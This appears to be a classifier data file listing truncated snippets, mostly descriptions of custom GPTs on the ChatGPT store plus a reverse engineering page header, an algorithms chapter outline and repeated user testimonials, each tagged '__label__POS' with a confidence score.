GPT URL: https://chat.openai.com/g/g-QX8tGS9HQ-thamizh-gpt GPT logo: <img src="https://files.oaiusercontent.com/file-WH8OlQFdF0kPJogU8z4eDSyU?se=2124-02-21T13%3A26%3A04Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3De8af8910-ab9b-4174-9293-54e2319e9458.png&sig=cYDMjtjths...
__label__POS
0.709816
GPT URL: https://chat.openai.com/g/g-02zmxuXd5-node-js-gpt-project-builder GPT Title: Node.js GPT - Project Builder GPT Description: This is Cogo, a project planner + executer. Tell him your packages, and wishes. He'll outline, pseudocode, and build it at your command. - By douglas.life GPT Logo: <img src="https://f...
__label__POS
0.740072
GPT URL: https://chat.openai.com/g/g-r4sudcvR3-code-monkey GPT Title: Code Monkey GPT Description: Precise coder, reviews for flaws, seeks details. - By THIAGO C DUARTE GPT Logo: <img src="https://files.oaiusercontent.com/file-1BXjWs0MNKSg048SnLfPLKcI?se=2123-10-22T14%3A22%3A18Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%...
__label__POS
0.782896
GPT URL: https://chat.openai.com/g/g-B3hgivKK9-write-for-me GPT Title: Write For Me GPT Description: Write tailored, engaging content with a focus on quality, relevance and precise word count. - By puzzle.today GPT Logo: <img src="https://files.oaiusercontent.com/file-hVjI65nZeCAowpoArhSWjynX?se=2123-10-24T11%3A26%3...
__label__POS
0.954006
GPT URL: https://chat.openai.com/g/g-hQtCHJqg7-virtual-obesity-expert GPT logo: <img src="https://files.oaiusercontent.com/file-5iiVkCOdcFbhNT2c9zs9MGxx?se=2124-01-08T01%3A43%3A12Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3D6c3a98bd-cb47-442c-a21c-c9853ef19527.png&sig...
__label__POS
0.783627
GPT URL: https://chat.openai.com/g/g-jXT5rtsu8-abchallenger GPT logo: <img src="https://files.oaiusercontent.com/file-NFB0UfT5b46JTiNJuQSASlsT?se=2124-03-14T13%3A33%3A56Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3DABChallenger.png&sig=m%2BX3JH%2BZkrAPFLVRP/8vRgj%2BZCX...
__label__POS
0.633707
GPT URL: https://chat.openai.com/g/g-IPhekPbYD-etsy-seo-expert GPT logo: <img src="https://files.oaiusercontent.com/file-RDu5A4BwOBzSbKbgY2gexNou?se=2123-10-20T16%3A14%3A15Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutable&rscd=attachment%3B%20filename%3DDALL%25C2%25B7E%25202023-11-13%252019.13.27%2520-%...
__label__POS
0.977064
GPT URL: https://chatgpt.com/g/g-uAaa7Ywi8-grok GPT logo: <img src="https://files.oaiusercontent.com/file-mCrl1Yn4PPrk5VUuT8NH9BoV?se=2124-04-22T20%3A01%3A34Z&sp=r&sv=2023-11-03&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3D4c197133-73fe-4df9-a44c-6197186280b7.png&sig=aoBm8/4Q1zn8JtNHi0TGb...
__label__POS
0.998394
GPT URL: https://chatgpt.com/g/g-Ea9dOGpV1-bible-quotes GPT logo: <img src="https://chatgpt.com/backend-api/estuary/content?id=file-BVS7cIyaCI0Mgz1ljUsxbQNq&gizmo_id=g-Ea9dOGpV1&ts=487188&p=gpp&cid=1&sig=4800078a68771f4506bfec8dac1209cd280c9f7d2e927ad8be7966c7f610eac4" width="100px" /> GPT Title: Bible quotes GPT De...
__label__POS
0.986548
GPT URL: https://chat.openai.com/g/g-9YeZz6m6k-math-solver GPT logo: <img src="https://files.oaiusercontent.com/file-tSZCMmjyqOBMHOnHPUxKQH8t?se=2123-10-21T09%3A02%3A36Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutable&rscd=attachment%3B%20filename%3D7e1dfc13-782c-4d41-843f-6908894cf8d7.png&sig=8FWfLPP5o...
__label__POS
0.947426
GPT URL: https://chat.openai.com/g/g-XN5q7hr4i-leads-collector GPT logo: <img src="https://files.oaiusercontent.com/file-2fn24RO2GZbQYU7898S1ddEF?se=2124-01-29T16%3A36%3A36Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3D7b996efe-c3cc-48a4-97f7-87f9aac818be.png&sig=ZwV3VC...
__label__POS
0.977352
GPT URL: https://chat.openai.com/g/g-Qj7PwYoxK-sql-wizard GPT logo: <img src="https://files.oaiusercontent.com/file-FCLekXWEQReGAQcOpahaz3GD?se=2123-10-18T22%3A40%3A17Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutable&rscd=attachment%3B%20filename%3D1e49e6c1-5440-41c4-9bf6-1899994d36bb.png&sig=wKI9iUVPp7...
__label__POS
0.671877
GPT URL: https://chat.openai.com/g/g-acZ1g7xWK-educational-email-course-creator GPT logo: <img src="https://files.oaiusercontent.com/file-UNueF7MjvhUBP1rLwS8766Ib?se=2123-12-22T13%3A27%3A23Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D1209600%2C%20immutable&rscd=attachment%3B%20filename%3DDALL%25C2%25B7E%25202024-01-14%252...
__label__POS
0.845469
GPT URL: https://chat.openai.com/g/g-H93fevKeK-executive-f-x-n GPT Title: Executive f(x)n GPT Description: Flow on Demand. Plan, Take Action (for real this time), Stay Consistent, and Accomplish your Dreams. Step by Step. Executive Function, ADHD Button & Motivation Starter kit. v1.1By mindgoblinstudios.com GPT Lo...
__label__POS
0.732373
GPT URL: https://chat.openai.com/g/g-GJdH0BxMk-phoneix-ink GPT Title: PhoneixInk GPT Description: Will help you to write - By MEHMET GENCAY IŞIK GPT Logo: <img src="https://files.oaiusercontent.com/file-Qm1LAHpwYVN8IDNHJDxWsUQX?se=2123-10-17T07%3A43%3A01Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutabl...
__label__POS
0.688912
GPT URL: https://chat.openai.com/g/g-O43XF1yij-dominant-guide GPT logo: <img src="https://files.oaiusercontent.com/file-kWY6weOdC05MZPCNBZqHDg4O?se=2123-10-18T07%3A10%3A58Z&sp=r&sv=2021-08-06&sr=b&rscc=max-age%3D31536000%2C%20immutable&rscd=attachment%3B%20filename%3D8373747a-2c91-43c6-aa2c-8f9efb618ed4.png&sig=59cYd8...
__label__POS
0.857835
<!DOCTYPE html> <!-- saved from url=(0040)https://0xinfection.github.io/reversing/ --> <html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Introduction · Reverse Engineering</title> <meta http-equiv="X-UA-Compatible" content="IE=edge"> ...
__label__POS
0.864556
# Part 7: Book of the Dead pt2 ## Chapter 19: Underworld 101: Data Structures & algos 70: Algorithms, Search, Binary Search, Sorting, Merge Sort. Big O, little o, and aysmptotic notation. You DO NOT NEED to memorize every algorithm, or every detail Treat these as examples to understand a. ways to solve problems b. ...
__label__POS
0.748843
You have saved me hours and hours of time. This is a game changer for me https://x.com/ajruecker/status/1723225423625310485?s=46 I tried Grimoire, and it is fantastic, man, I never wrote a code in my life and with him I can create a website from scratch !!!!! Wow, I cannot believe what I saw ! https://x.com/God____Had...
__label__POS
0.614133
You have saved me hours and hours of time. This is a game changer for me https://x.com/ajruecker/status/1723225423625310485?s=46 I tried Grimoire, and it is fantastic, man, I never wrote a code in my life and with him I can create a website from scratch !!!!! Wow, I cannot believe what I saw ! https://x.com/God____Had...
__label__POS
0.614133
You have saved me hours and hours of time. This is a game changer for me https://x.com/ajruecker/status/1723225423625310485?s=46 I tried Grimoire, and it is fantastic, man, I never wrote a code in my life and with him I can create a website from scratch !!!!! Wow, I cannot believe what I saw ! https://x.com/God____Had...
__label__POS
0.614133
# Part 7: Book of the Dead pt2 ## Chapter 19: Underworld 101: Data Structures & algos 70: Algorithms, Search, Binary Search, Sorting, Merge Sort. Big O, little o, and aysmptotic notation. You DO NOT NEED to memorize every algorithm, or every detail Treat these as examples to understand a. ways to solve problems b. ...
__label__POS
0.645922
You have saved me hours and hours of time. This is a game changer for me https://x.com/ajruecker/status/1723225423625310485?s=46 I tried Grimoire, and it is fantastic, man, I never wrote a code in my life and with him I can create a website from scratch !!!!! Wow, I cannot believe what I saw ! https://x.com/God____Had...
__label__POS
0.614133